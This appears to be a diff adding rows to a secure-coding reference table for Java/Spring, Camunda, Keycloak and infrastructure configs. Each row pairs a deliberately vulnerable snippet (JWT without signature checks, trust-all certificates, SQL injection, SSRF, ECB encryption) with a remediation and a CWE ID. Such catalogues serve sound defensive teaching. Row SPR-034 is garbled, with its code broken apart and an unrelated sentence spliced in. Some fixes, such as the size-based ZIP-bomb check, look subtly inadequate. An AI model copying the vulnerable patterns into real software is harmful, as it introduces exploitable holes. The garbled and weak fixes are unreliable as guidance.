+| CAM-020 | Message Correlation Without Caller Authorization | `runtimeService.createMessageCorrelation("ApprovePayment")`<br>`.processInstanceId(pid).correlate();` | `identityService.setAuthenticatedUserId(auth.getName());`<br>`if (!authorizationService.createAuthorizationQuery()`<br>`.userIdIn(auth.getName()).resourceType(Resources.PROCESS_INSTANCE).resourceId(pid)`<br>`.list().stream().anyMatch(a -> a.getPermissions().contains(Permissions.UPDATE))) {`<br>`  throw new AccessDeniedException("forbidden");`<br>`}`<br>`runtimeService.createMessageCorrelation("ApprovePayment").processInstanceId(pid).correlate();` | Camunda 7.20 - Message/AuthZ | CWE-285 |
+| SPR-033 | BOLA via Missing Object Check in `@PostAuthorize` | `@PostAuthorize("returnObject.ownerId == authentication.name")`<br>`public OrderDto get(UUID id){ return mapper.toDto(repo.findById(id).orElseThrow()); }` | `@PostAuthorize("hasAuthority('order:read') and returnObject.ownerId == authentication.name")`<br>`public OrderDto get(UUID id){ return mapper.toDto(repo.findById(id).orElseThrow()); }`<br>`// add repository tenant/owner predicate as primary control` | Spring Security 6.x - BOLA | CWE-639 |
+| SPR-034 | Weak `PermissionEvaluator` Always Returns True on Null Target | `public boolean hasPermission(Authentication a, Object t, Object p){`<br>`  return t == null |  | policy.allow(a, t, p.toString());`<br>`}` | `public boolean hasPermission(Authentication a, Object t, Object p){`<br>`  if (a == null | Bind object access to authenticated principal ownership checks. | t == null |  | p == null) return false;`<br>`  return switch (t) {`<br>`    case Order o -> policy.can(a.getName(), o.getTenantId(), p.toString());`<br>`    default -> false;`<br>`  };`<br>`}` | Spring Security 6.x - Method Security | CWE-639 |
+| SPR-035 | JWT Accepts `alg=none` / Skips Signature Verification | `SignedJWT jwt = SignedJWT.parse(token);`<br>`JWTClaimsSet c = jwt.getJWTClaimsSet();` | `NimbusJwtDecoder dec = NimbusJwtDecoder.withJwkSetUri(jwks).jwsAlgorithm(SignatureAlgorithm.RS256).build();`<br>`dec.setJwtValidator(JwtValidators.createDefaultWithIssuer(issuer));`<br>`Jwt jwt = dec.decode(token);` | Spring Security 6.x - JWT Validation | CWE-347 |
+| SPR-036 | HS256/RS256 Algorithm Confusion in Custom Verifier | `JWSVerifier v = new MACVerifier(publicKeyBytes);`<br>`signedJwt.verify(v);` | `JWSAlgorithm expected = JWSAlgorithm.RS256;`<br>`if (!expected.equals(signedJwt.getHeader().getAlgorithm())) throw new BadJwtException("bad alg");`<br>`JWSVerifier v = new RSASSAVerifier(rsaPublicKey);`<br>`if (!signedJwt.verify(v)) throw new BadJwtException("bad sig");` | Spring Security 6.x - JOSE/Nimbus | CWE-347 |
+| SPR-037 | Missing `iss` and `aud` Validation | `Jwt jwt = decoder.decode(token);`<br>`return jwt;` | `OAuth2TokenValidator<Jwt> v = new DelegatingOAuth2TokenValidator<>(`<br>`  JwtValidators.createDefaultWithIssuer("https://idp.example/realms/main"),`<br>`  new AudienceValidator(Set.of("hexvibe-api"))`<br>`);`<br>`decoder.setJwtValidator(v);` | Spring Security 6.x - JWT Claims | CWE-345 |
+| SPR-038 | Accepting Expired JWT due to Disabled Timestamp Validator | `decoder.setJwtValidator(token -> OAuth2TokenValidatorResult.success());` | `decoder.setJwtValidator(new DelegatingOAuth2TokenValidator<>(`<br>`  JwtValidators.createDefaultWithIssuer(issuer),`<br>`  new JwtTimestampValidator(Duration.ofSeconds(60))`<br>`));` | Spring Security 6.x - JWT Freshness | CWE-345 |
+| SPR-039 | OAuth2 Login Without PKCE for Public Client | `oauth2Client.tokenUri(tokenUri);`<br>`// authorization request omits code_challenge` | `http.oauth2Login(c -> c.authorizationEndpoint(a -> a.authorizationRequestResolver(pkceResolver())));`<br>`DefaultOAuth2AuthorizationRequestResolver r = ...;`<br>`r.setAuthorizationRequestCustomizer(OAuth2AuthorizationRequestCustomizers.withPkce());` | Spring Security 6.x - OAuth2 PKCE | CWE-345 |
+| SPR-040 | `state` Leakage and Non-binding to User Session | `String state = UUID.randomUUID().toString();`<br>`redirect("/oauth2/authorization/keycloak?state=" + state);` | `http.oauth2Login(c -> c.authorizationEndpoint(a -> a`<br>`.authorizationRequestRepository(new HttpSessionOAuth2AuthorizationRequestRepository())`<br>`));`<br>`// state generated and validated by framework-bound repository` | Spring Security 6.x - OAuth2 State | CWE-352 |
+| SPR-041 | Open Redirect via Unvalidated `redirect_uri` | `String redirect = req.getParameter("redirect_uri");`<br>`return "redirect:" + redirect;` | `Set<String> allowed = Set.of("https://app.example/callback", "myapp://callback");`<br>`URI u = URI.create(req.getParameter("redirect_uri"));`<br>`if (!allowed.contains(u.toString())) throw new AccessDeniedException("bad redirect_uri");`<br>`return "redirect:" + u;` | Spring Security 6.x - OAuth2 Redirect Safety | CWE-601 |
+| SPR-042 | Session Fixation in Servlet Flow | `http.sessionManagement(s -> s.sessionFixation(f -> f.none()));` | `http.sessionManagement(s -> s`<br>`.sessionFixation(f -> f.migrateSession())`<br>`.sessionCreationPolicy(SessionCreationPolicy.IF_REQUIRED)`<br>`);` | Spring Security 6.x - Session Management | CWE-384 |
+| SPR-043 | `SecurityContext` Leak Across Threads in Async Execution | `CompletableFuture.runAsync(() -> service.handle(SecurityContextHolder.getContext()));` | `SecurityContext context = SecurityContextHolder.createEmptyContext();`<br>`context.setAuthentication(SecurityContextHolder.getContext().getAuthentication());`<br>`executor.execute(new DelegatingSecurityContextRunnable(() -> service.handle(), context));` | Spring Security 6.x - Context Propagation | CWE-384 |
+| SPR-044 | Stateless API Accidentally Uses Session + CSRF Disabled | `http.csrf(csrf -> csrf.disable())`<br>`.sessionManagement(s -> s.sessionCreationPolicy(SessionCreationPolicy.ALWAYS));` | `http.securityMatcher("/api/**")`<br>`.csrf(csrf -> csrf.disable())`<br>`.sessionManagement(s -> s.sessionCreationPolicy(SessionCreationPolicy.STATELESS))`<br>`.oauth2ResourceServer(o -> o.jwt(Customizer.withDefaults()));` | Spring Security 6.x - Stateless Hardening | CWE-384 |
+| AK-001 | Keycloak Realm Roles Mapped Incorrectly (`ROLE_` Prefix Loss) | `JwtGrantedAuthoritiesConverter c = new JwtGrantedAuthoritiesConverter();`<br>`// only scope mapped, realm_access ignored` | `Converter<Jwt, Collection<GrantedAuthority>> conv = jwt -> {`<br>`  var auth = new ArrayList<GrantedAuthority>();`<br>`  auth.addAll(scopeAuthorities(jwt));`<br>`  auth.addAll(realmRoleAuthorities(jwt, "ROLE_"));`<br>`  return auth;`<br>`};`<br>`http.oauth2ResourceServer(o -> o.jwt(j -> j.jwtAuthenticationConverter(jwt -> new JwtAuthenticationToken(jwt, conv.convert(jwt)))));` | Keycloak/Spring Security - Role Mapping | CWE-285 |
+| AK-002 | Missing `azp` (Authorized Party) Validation for Multi-client Realm | `Jwt jwt = decoder.decode(token);`<br>`// checks iss only` | `OAuth2TokenValidator<Jwt> azp = token ->`<br>`  "hexvibe-frontend".equals(token.getClaimAsString("azp"))`<br>`  ? OAuth2TokenValidatorResult.success()`<br>`  : OAuth2TokenValidatorResult.failure(new OAuth2Error("invalid_token","bad azp",null));`<br>`decoder.setJwtValidator(new DelegatingOAuth2TokenValidator<>(JwtValidators.createDefaultWithIssuer(issuer), azp));` | Keycloak/JWT Validation | CWE-345 |
+| AK-003 | Trusting Keycloak Token Introspection Without Audience Constraint | `OpaqueTokenIntrospector i = new NimbusOpaqueTokenIntrospector(uri, id, secret);`<br>`return i.introspect(token);` | `OpaqueTokenIntrospector base = new NimbusOpaqueTokenIntrospector(uri, id, secret);`<br>`OpaqueTokenIntrospector safe = t -> {`<br>`  OAuth2AuthenticatedPrincipal p = base.introspect(t);`<br>`  if (!p.getAttribute("aud").toString().contains("hexvibe-api")) throw new BadOpaqueTokenException("bad aud");`<br>`  return p;`<br>`};` | Keycloak/OAuth2 Resource Server | CWE-345 |
+| AK-004 | Using Legacy Keycloak Adapter with Incomplete Validation Paths | `keycloak.enabled=true`<br>`keycloak.bearer-only=true`<br>`// legacy adapter chain` | `http.oauth2ResourceServer(o -> o.jwt(Customizer.withDefaults()));`<br>`spring.security.oauth2.resourceserver.jwt.issuer-uri=https://idp.example/realms/main`<br>`// use Spring Security first-class resource server + Nimbus validators` | Keycloak Integration Modernization | CWE-347 |
+| AK-005 | Accepting Tokens from Wrong Realm with Shared JWKS Host | `NimbusJwtDecoder.withJwkSetUri("https://idp.example/protocol/openid-connect/certs").build();` | `NimbusJwtDecoder dec = JwtDecoders.fromIssuerLocation("https://idp.example/realms/hexvibe");`<br>`dec.setJwtValidator(JwtValidators.createDefaultWithIssuer("https://idp.example/realms/hexvibe"));` | Keycloak Multi-realm Isolation | CWE-345 |
+| AK-006 | Privilege Escalation via Direct Use of `resource_access` Client Roles | `List<String> roles = jwt.getClaim("resource_access");`<br>`authorities.addAll(roles.stream().map(SimpleGrantedAuthority::new).toList());` | `String clientId = "hexvibe-api";`<br>`Map<String,Object> ra = jwt.getClaim("resource_access");`<br>`Collection<String> clientRoles = extractClientRoles(ra, clientId);`<br>`authorities.addAll(clientRoles.stream().filter(ALLOWLIST::contains).map(r -> new SimpleGrantedAuthority("ROLE_" + r)).toList());` | Keycloak Role Scope Isolation | CWE-285 |
+| CAM-021 | No Rate Limit on Camunda PDF Generation Endpoint | `@PostMapping("/process/{id}/pdf")`<br>`byte[] pdf = pdfService.renderFullAudit(id);`<br>`return ResponseEntity.ok(pdf);` | `Bucket b = bucketService.resolve(auth.getName(), "pdf");`<br>`if (!b.tryConsume(1)) return ResponseEntity.status(429).build();`<br>`return ResponseEntity.ok(pdfService.renderFullAudit(id));`<br>`// Bucket4j per-user + per-tenant quotas` | Camunda API Protection | CWE-770 |
+| CAM-022 | Unbounded Historic Query Export DoS | `historyService.createHistoricTaskInstanceQuery().list();` | `Page<HistoricTaskInstance> page = historyQuery.taskAssignee(auth.getName()).listPage(offset, Math.min(limit, 500));`<br>`RateLimiter rl = rateLimiterRegistry.rateLimiter("camunda-history-export");`<br>`Supplier<Page<HistoricTaskInstance>> s = RateLimiter.decorateSupplier(rl, () -> page);`<br>`return s.get();` | Camunda API Protection | CWE-770 |
+| CAM-023 | Message Start Endpoint Accepts Burst Traffic Without Backpressure | `runtimeService.startProcessInstanceByKey("bulkImport", vars);` | `RateLimiter limiter = rateLimiterRegistry.rateLimiter("camunda-start");`<br>`Try.runSupplier(RateLimiter.decorateSupplier(limiter, () ->`<br>`  runtimeService.startProcessInstanceByKey("bulkImport", vars)`<br>`)).getOrElseThrow(ex -> new TooManyRequestsException());` | Camunda Resilience | CWE-770 |
+| CAM-024 | PII/Token Values Logged from Process Variables | `log.info("vars={}", runtimeService.getVariables(piId));` | `Map<String,Object> safe = redact(runtimeService.getVariables(piId), Set.of("ssn","token","authorization"));`<br>`log.info("process={} vars={}", piId, safe.keySet());` | Camunda Logging Hygiene | CWE-532 |
+| SPR-045 | Missing Rate Limit on Expensive Search API | `@GetMapping("/api/search")`<br>`return service.heavyElasticSearch(q, filters);` | `Bucket bucket = bucketService.resolve(clientIp(req), "search");`<br>`if (!bucket.tryConsume(1)) throw new ResponseStatusException(HttpStatus.TOO_MANY_REQUESTS);`<br>`return service.heavyElasticSearch(q, filters);` | Spring Boot API Protection | CWE-770 |
+| SPR-046 | No Bulkhead/Timeout Around Slow Downstream Calls | `return reportClient.fetchLargeReport(id);` | `@TimeLimiter(name = "reportTL")`<br>`@Bulkhead(name = "reportBH", type = Bulkhead.Type.THREADPOOL)`<br>`@RateLimiter(name = "reportRL")`<br>`public CompletableFuture<ReportDto> getReport(String id){ ... }`<br>`// Resilience4j controls concurrency and latency` | Spring Boot Resilience | CWE-770 |
+| SPR-047 | Logging `Authorization` Header in Request Filter | `log.info("auth={}", request.getHeader("Authorization"));` | `String authz = request.getHeader("Authorization");`<br>`log.info("auth_scheme={}", authz == null ? "none" : authz.split(" ")[0]);`<br>`// never log credentials/tokens` | Spring Boot Logging | CWE-532 |
+| SPR-048 | PII Propagated into Trace Tags (Micrometer/Sleuth) | `tracer.currentSpan().tag("user.email", user.getEmail());`<br>`tracer.currentSpan().tag("ssn", req.ssn());` | `tracer.currentSpan().tag("user.id", user.getId().toString());`<br>`observation.highCardinalityKeyValue("pii.redacted", "true");`<br>`// policy: denylist tags: email, ssn, pan, token` | Observability Privacy | CWE-532 |
+| SPR-049 | Actuator Heapdump Exposed Without AuthZ | `management.endpoints.web.exposure.include=health,info,heapdump`<br>`management.endpoint.heapdump.enabled=true` | `management.endpoints.web.exposure.include=health,info,prometheus`<br>`management.endpoint.heapdump.enabled=false`<br>`http.securityMatcher("/actuator/**")`<br>`.authorizeHttpRequests(a -> a.requestMatchers("/actuator/health","/actuator/info").permitAll().anyRequest().hasRole("OPS"));` | Spring Boot Actuator Security | CWE-532 |
+| SPR-050 | Mass Assignment via Entity Binding in REST Controller | `@PostMapping("/users")`<br>`public User create(@RequestBody User entity){ return repo.save(entity); }` | `record CreateUserRequest(@Email String email, @NotBlank String displayName) {}`<br>`@PostMapping("/users")`<br>`public UserDto create(@Valid @RequestBody CreateUserRequest in){`<br>`  User u = new User(); u.setEmail(in.email()); u.setDisplayName(in.displayName());`<br>`  u.setRole("USER");`<br>`  return mapper.toDto(repo.save(u));`<br>`}` | Spring Boot API Binding | CWE-915 |
+| SPR-051 | PATCH Endpoint Allows Overwriting `id` and `role` | `objectMapper.readerForUpdating(user).readValue(jsonPatchBody);`<br>`repo.save(user);` | `record UserPatch(String displayName, String locale) {}`<br>`@InitBinder void init(WebDataBinder b){ b.setDisallowedFields("id","role","authorities","tenantId"); }`<br>`UserPatch p = mapper.readValue(json, UserPatch.class);`<br>`user.apply(p); repo.save(user);` | Spring Boot API Binding | CWE-915 |
+| SPR-052 | Stack Traces Returned to API Clients | `return ResponseEntity.status(500).body(Map.of("error", ex.toString(), "trace", stackTrace(ex)));` | `ProblemDetail pd = ProblemDetail.forStatus(500);`<br>`String ref = UUID.randomUUID().toString();`<br>`log.error("ref={} internal error", ref, ex);`<br>`pd.setDetail("Internal error. Ref=" + ref);`<br>`return ResponseEntity.status(500).body(pd);` | Spring Boot Error Handling | CWE-209 |
+| SPR-053 | `server.error.include-stacktrace=always` in Production | `server.error.include-stacktrace=always`<br>`server.error.include-message=always` | `server.error.include-stacktrace=never`<br>`server.error.include-message=never`<br>`server.error.include-binding-errors=never`<br>`// keep details in centralized logs only` | Spring Boot Error Handling | CWE-209 |
+| SPR-054 | Elasticsearch Proxy Endpoint Allows DoS by Large `size` | `@GetMapping("/api/es")`<br>`return es.search(query, request.getParameter("size"));` | `int size = Math.min(Integer.parseInt(req.getParameter("size")), 100);`<br>`Bucket b = bucketService.resolve(clientIp(req), "es-query");`<br>`if (!b.tryConsume(1)) throw new ResponseStatusException(HttpStatus.TOO_MANY_REQUESTS);`<br>`return es.searchSafe(query, size);` | API + Elasticsearch Gateway | CWE-770 |
+| INF-001 | Docker Image Runs as Root | `FROM eclipse-temurin:21-jre`<br>`COPY app.jar /app.jar`<br>`ENTRYPOINT ["java","-jar","/app.jar"]` | `FROM eclipse-temurin:21-jre`<br>`RUN addgroup --system app && adduser --system --ingroup app app`<br>`USER app:app`<br>`COPY --chown=app:app app.jar /app.jar`<br>`ENTRYPOINT ["java","-jar","/app.jar"]` | Docker Hardening | CWE-250 |
+| INF-002 | Docker Container Writable FS + No Cap Drop | `docker run myapp:latest` | `docker run --read-only --cap-drop=ALL --security-opt=no-new-privileges --pids-limit=200 myapp:latest`<br>`# pair with tmpfs for /tmp when required` | Docker Runtime Hardening | CWE-250 |
+| INF-003 | Helm Chart Missing Resource Limits Enables Noisy-Neighbor DoS | `resources: {}` | `resources:`<br>`  requests: { cpu: "250m", memory: "256Mi" }`<br>`  limits: { cpu: "1", memory: "1Gi" }`<br>`autoscaling: { enabled: true, minReplicas: 2, maxReplicas: 8 }` | Kubernetes (Helm) Resilience | CWE-770 |
+| INF-004 | Helm Deployment Missing `securityContext` | `securityContext: {}` | `securityContext:`<br>`  runAsNonRoot: true`<br>`  runAsUser: 10001`<br>`  allowPrivilegeEscalation: false`<br>`  readOnlyRootFilesystem: true`<br>`  capabilities: { drop: ["ALL"] }`<br>`  seccompProfile: { type: RuntimeDefault }` | Kubernetes Pod Security | CWE-250 |
+| INF-005 | Nginx Missing HSTS/CSP and Security Headers | `server {`<br>`  listen 443 ssl;`<br>`}` | `server {`<br>`  listen 443 ssl;`<br>`  add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;`<br>`  add_header Content-Security-Policy "default-src 'self'" always;`<br>`  add_header X-Content-Type-Options "nosniff" always;`<br>`  add_header X-Frame-Options "DENY" always;`<br>`}` | Nginx Edge Security | CWE-693 |
+| INF-006 | Nginx Forwards Sensitive Headers to Upstream Logs | `proxy_set_header Authorization ...;`<br>`log_format main '... ...';` | `proxy_set_header Authorization "";`<br>`map ... ... { default "present"; "" "none"; }`<br>`log_format main '... auth=...';` | Nginx Logging Hygiene | CWE-532 |
+| INF-007 | Public Actuator Routes Exposed via Ingress | `paths:`<br>`- /actuator`<br>`- /` | `nginx.ingress.kubernetes.io/whitelist-source-range: "10.0.0.0/8"`<br>`nginx.ingress.kubernetes.io/server-snippet: | `<br>`  location /actuator { deny all; }`<br>`# expose only /actuator/health behind auth/network policy` | Kubernetes Ingress Security | CWE-200 |
+| INF-008 | Missing API-Level Rate Limit at Nginx Gateway | `location /api/ { proxy_pass http://app; }` | `limit_req_zone ... zone=api_rl:10m rate=20r/s;`<br>`location /api/ {`<br>`  limit_req zone=api_rl burst=40 nodelay;`<br>`  proxy_pass http://app;`<br>`}` | Nginx DoS Protection | CWE-770 |
+| CAM-025 | Camunda External Task SSRF via Worker Callback URL | `String cb = (String) execution.getVariable("callbackUrl");`<br>`webClient.post().uri(cb).retrieve().toBodilessEntity().block();` | `record CallbackEndpoint(String host, int port, String path) {}`<br>`CallbackEndpoint ep = endpointPolicy.parseAndValidate((String) execution.getVariable("callbackUrl"));`<br>`webClient.post().uri("https://" + ep.host() + ":" + ep.port() + ep.path()).retrieve().toBodilessEntity().block();` | Camunda Microservice Integration | CWE-918 |
+| CAM-026 | Camunda Signal Bridge Without Trust Boundary Validation | `runtimeService.createSignalEvent(signalName).send();`<br>`audit.log("forwarded signal=" + signalName);` | `record TrustedSignal(String name, String sourceService) {}`<br>`TrustedSignal s = signalRegistry.requireTrusted(signalName, sourceHeader);`<br>`runtimeService.createSignalEvent(s.name()).send();` | Camunda Workflow Federation | CWE-441 |
+| CAM-027 | Camunda Message Correlation with Unvalidated Tenant Routing | `runtimeService.createMessageCorrelation("TenantEvent").processInstanceBusinessKey(key).correlate();` | `record TenantEvent(String tenantId, String key) {}`<br>`TenantEvent ev = tenantValidator.requireOwned(authTenant, key);`<br>`runtimeService.createMessageCorrelation("TenantEvent").setVariable("tenantId", ev.tenantId()).processInstanceBusinessKey(ev.key()).correlate();` | Camunda Multi-tenant Authorization | CWE-441 |
+| CAM-028 | Camunda History API Exposes Envers-like Timeline Across Tenants | `historyService.createHistoricDetailQuery().list();` | `List<HistoricDetail> d = historyService.createHistoricDetailQuery().processInstanceBusinessKey(bk).list();`<br>`return d.stream().filter(x -> acl.canReadHistory(authUser, x.getProcessInstanceId())).toList();` | Camunda Audit Data Exposure | CWE-209 |
+| SPR-071 | SSRF via RestTemplate User-controlled URL | `String u = req.url();`<br>`restTemplate.getForObject(u, String.class);` | `record UpstreamRequest(URI uri) {}`<br>`UpstreamRequest r = upstreamPolicy.allowlisted(req.url());`<br>`restTemplate.getForObject(r.uri(), String.class);` | Spring Cloud Microservices | CWE-918 |
+| SPR-072 | SSRF via WebClient Dynamic Host | `webClient.get().uri(request.getTarget()).retrieve().bodyToMono(String.class);` | `record ServiceRef(String service, String path) {}`<br>`ServiceRef ref = serviceDirectory.resolve(request.getTarget());`<br>`webClient.get().uri("https://" + ref.service() + ref.path()).retrieve().bodyToMono(String.class);` | Spring Cloud Microservices | CWE-918 |
+| SPR-073 | Insecure Eureka Client Over Plain HTTP | `eureka.client.serviceUrl.defaultZone=http://eureka.internal:8761/eureka` | `eureka.client.serviceUrl.defaultZone=https://eureka.internal:8761/eureka`<br>`eureka.instance.securePortEnabled=true`<br>`spring.security.oauth2.client.registration.discovery.client-authentication-method=private_key_jwt` | Spring Cloud Discovery Security | CWE-441 |
+| SPR-074 | Spring Config Server Trusts Unsigned Remote Git Changes | `spring.cloud.config.server.git.uri=https://git.example/config`<br>`spring.cloud.config.fail-fast=false` | `spring.cloud.config.server.git.uri=https://git.example/config`<br>`spring.cloud.config.server.git.clone-on-start=true`<br>`spring.cloud.config.server.git.force-pull=false`<br>`configIntegrityVerifier.requireSignedCommit();` | Spring Cloud Config Integrity | CWE-441 |
+| SPR-075 | Feign Client Propagates Sensitive Authorization Header to Third-party | `requestTemplate.header("Authorization", inboundAuth);`<br>`return feignClient.call(target);` | `record OutboundHeaders(String requestId, String traceId) {}`<br>`OutboundHeaders h = new OutboundHeaders(reqId, traceId);`<br>`requestTemplate.headers(Map.of("X-Request-Id", List.of(h.requestId()), "X-Trace-Id", List.of(h.traceId())));` | Spring Cloud Feign Security | CWE-200 |
+| SPR-076 | Feign Forwarded Host Header Injection | `requestTemplate.header("X-Forwarded-Host", request.getHeader("X-Forwarded-Host"));` | `String fwd = forwardedHostPolicy.normalizeTrusted(request);`<br>`requestTemplate.header("X-Forwarded-Host", fwd);` | Spring Cloud Feign Security | CWE-20 |
+| SPR-077 | Kafka Listener Unsafe Jackson Polymorphic Deserialization | `Object evt = mapper.readValue(record.value(), Object.class);`<br>`handler.handle(evt);` | `record EventEnvelope(String type, JsonNode payload) {}`<br>`EventEnvelope env = mapper.readValue(record.value(), EventEnvelope.class);`<br>`DomainEvent evt = switch (env.type()) { case "ORDER_CREATED" -> mapper.treeToValue(env.payload(), OrderCreated.class); case "USER_LOCKED" -> mapper.treeToValue(env.payload(), UserLocked.class); default -> throw new SecurityException("unsupported type"); };` | Messaging Deserialization | CWE-502 |
+| SPR-078 | RabbitMQ Poison Pill Requeue Loop | `catch (Exception ex) { throw ex; }`<br>`container.setDefaultRequeueRejected(true);` | `container.setDefaultRequeueRejected(false);`<br>`DeadLetterPublishingRecoverer dlq = new DeadLetterPublishingRecoverer(rabbitTemplate);`<br>`new DefaultErrorHandler(dlq, new FixedBackOff(1000L, 3L));` | Messaging Reliability Security | CWE-20 |
+| SPR-079 | Log Forging in Message Consumer | `log.warn("invalid message=" + record.value());` | `String safe = record.value().replaceAll("[\\r\\n\\t]", "_");`<br>`log.warn("invalid message={}", safe);` | Messaging Logging Security | CWE-117 |
+| SPR-080 | Spring Cloud Stream Binding Without TLS/SASL | `spring.cloud.stream.kafka.binder.brokers=kafka:9092`<br>`spring.cloud.stream.bindings.input.group=orders` | `spring.cloud.stream.kafka.binder.brokers=kafka.internal:9093`<br>`spring.cloud.stream.kafka.binder.configuration.security.protocol=SASL_SSL`<br>`spring.cloud.stream.kafka.binder.configuration.sasl.mechanism=SCRAM-SHA-512` | Messaging Transport Security | CWE-319 |
+| SPR-081 | Second-order SQL Injection via Persisted Sort Expression | `String sortExpr = prefRepo.findByUser(uid).getSortExpr();`<br>`entityManager.createNativeQuery("select * from invoice order by " + sortExpr).getResultList();` | `String sortExpr = prefRepo.findByUser(uid).getSortExpr();`<br>`String safeSort = Set.of("created_at","amount","status").contains(sortExpr) ? sortExpr : "created_at";`<br>`entityManager.createNativeQuery("select * from invoice order by " + safeSort).getResultList();` | JPA Query Security | CWE-89 |
+| SPR-082 | HQL Injection Through Stored Filter Template | `String filter = reportTemplate.getFilter();`<br>`entityManager.createQuery("from Payment p where " + filter).getResultList();` | `record PaymentFilter(String state, LocalDate fromDate) {}`<br>`PaymentFilter f = filterPolicy.resolve(reportTemplate);`<br>`entityManager.createQuery("from Payment p where p.state = :state and p.createdAt >= :from", Payment.class).setParameter("state", f.state()).setParameter("from", f.fromDate().atStartOfDay()).getResultList();` | JPA Query Security | CWE-89 |
+| SPR-083 | Jackson JsonView Misconfiguration Exposes Internal Fields | `@JsonView(Views.Public.class)`<br>`public UserEntity getUser(...) { return repo.findById(id).orElseThrow(); }` | `record UserPublicDto(UUID id, String displayName) {}`<br>`@JsonView(Views.Public.class)`<br>`public UserPublicDto getUser(...) { UserEntity u = repo.findById(id).orElseThrow(); return new UserPublicDto(u.getId(), u.getDisplayName()); }` | API Data Exposure | CWE-209 |
+| SPR-084 | Envers Revision Endpoint Exposes Full Entity History | `auditReader.createQuery().forRevisionsOfEntity(Account.class, true, true).getResultList();` | `List<AccountRevisionDto> revs = auditService.findPublicRevisions(accountId, authTenant);`<br>`return revs.stream().filter(r -> acl.canReadAccount(authUser, r.accountId())).toList();` | Persistence Audit Exposure | CWE-200 |
+| SPR-085 | Event Loop Starvation from Blocking JPA Call in WebFlux | `return Mono.fromCallable(() -> repo.findAll()).map(this::toDto);` | `return Mono.fromCallable(() -> repo.findAll())`<br>`.subscribeOn(Schedulers.boundedElastic())`<br>`.map(this::toDto);` | Reactive Security | CWE-400 |
+| SPR-086 | Blocking HTTP Call on Reactor Event Loop | `return webClient.get().uri(path).retrieve().bodyToMono(String.class).map(v -> legacyClient.blockingCall(v));` | `return webClient.get().uri(path).retrieve().bodyToMono(String.class)`<br>`.publishOn(Schedulers.boundedElastic())`<br>`.map(legacyClient::blockingCall);` | Reactive Security | CWE-400 |
+| SPR-087 | Reactor Context Loss Leads to Authorization Bypass | `return authz.check().flatMap(ok -> service.read(accountId));` | `return ReactiveSecurityContextHolder.getContext()`<br>`.map(SecurityContext::getAuthentication)`<br>`.flatMap(auth -> authz.check(auth, accountId).flatMap(ok -> service.readOwned(auth.getName(), accountId)));` | Reactive Security | CWE-362 |
+| SPR-088 | Parallel Flux Processing with Shared Mutable Auth State | `AtomicReference<String> principal = new AtomicReference<>();`<br>`flux.parallel().runOn(Schedulers.parallel()).doOnNext(x -> principal.set(x.user())).sequential();` | `record AuthEvent(String userId, String payload) {}`<br>`flux.parallel().runOn(Schedulers.parallel()).map(e -> new AuthEvent(e.user(), e.payload())).sequential();` | Reactive Security | CWE-362 |
+| SPR-089 | Infinite Reactive Stream Without Backpressure Limit | `Flux.interval(Duration.ofMillis(1)).map(this::expensive).subscribe();` | `Flux.interval(Duration.ofMillis(1))`<br>`.limitRequest(1000)`<br>`.onBackpressureDrop()`<br>`.map(this::expensive)`<br>`.subscribe();` | Reactive Security | CWE-400 |
+| SPR-090 | Unbounded Server-Sent Events Stream | `return Flux.generate(sink -> sink.next(loadHeavyPayload()));` | `return Flux.generate(sink -> sink.next(loadLightPayload()))`<br>`.take(500)`<br>`.timeout(Duration.ofSeconds(30));` | Reactive Security | CWE-400 |
+| SPR-091 | AES ECB Mode for Sensitive Data | `Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");`<br>`c.init(Cipher.ENCRYPT_MODE, key);` | `Cipher c = Cipher.getInstance("AES/GCM/NoPadding");`<br>`byte[] iv = SecureRandom.getInstanceStrong().generateSeed(12);`<br>`c.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv));` | Crypto Engineering | CWE-327 |
+| SPR-092 | Hardcoded PBKDF2 Iteration Count Too Low | `PBEKeySpec spec = new PBEKeySpec(password, salt, 1000, 256);` | `record KdfParams(int iterations, int keyLen) {}`<br>`KdfParams p = new KdfParams(310000, 256);`<br>`PBEKeySpec spec = new PBEKeySpec(password, salt, p.iterations(), p.keyLen());` | Crypto Engineering | CWE-327 |
+| SPR-093 | Trust-all Certificates in Reactor Netty SSL Context | `HttpClient.create().secure(s -> s.sslContext(SslContextBuilder.forClient().trustManager(InsecureTrustManagerFactory.INSTANCE)));` | `SslContext ctx = SslContextBuilder.forClient().trustManager(trustStoreManager.current()).build();`<br>`HttpClient.create().secure(s -> s.sslContext(ctx));` | Transport Security | CWE-295 |
+| SPR-094 | Persisting Plaintext PII in Microservice Event Store | `eventRepo.save(new EventEntity(userId, payloadJson));` | `record EncryptedEvent(byte[] cipherText, byte[] iv) {}`<br>`EncryptedEvent enc = cryptoService.encrypt(payloadJson);`<br>`eventRepo.save(new EventEntity(userId, Base64.getEncoder().encodeToString(enc.cipherText())));` | Privacy and Data-at-Rest | CWE-311 |
+| SPR-095 | Insecure gRPC/HTTP2 Client Without Certificate Pinning | `ManagedChannel ch = ManagedChannelBuilder.forAddress(host, 8443).useTransportSecurity().build();` | `record PinnedCert(String spkiSha256) {}`<br>`PinnedCert pin = pinStore.current(host);`<br>`ManagedChannel ch = grpcFactory.buildPinnedChannel(host, 8443, pin.spkiSha256());` | Microservice Transport Security | CWE-295 |
+| SPR-096 | XSLT Injection via User-controlled Stylesheet | `Transformer t = TransformerFactory.newInstance().newTransformer(new StreamSource(userXslt));` | `TransformerFactory tf = TransformerFactory.newInstance();`<br>`tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");`<br>`tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");`<br>`Transformer t = tf.newTransformer(new StreamSource(trustedXslt));` | XML Security | CWE-91 |
+| SPR-097 | ZIP Bomb / Denial of Service via Archive Expansion | `ZipEntry entry; while((entry = zis.getNextEntry()) != null) {`<br>`  byte[] b = zis.readAllBytes();`<br>`}` | `long MAX_SIZE = 100 * 1024 * 1024;`<br>`long total = 0;`<br>`ZipEntry entry;`<br>`while((entry = zis.getNextEntry()) != null) {`<br>`  total += Math.max(0, entry.getSize());`<br>`  if (total > MAX_SIZE) throw new SecurityException("Zip bomb detected");`<br>`}` | Archive Security | CWE-409 |
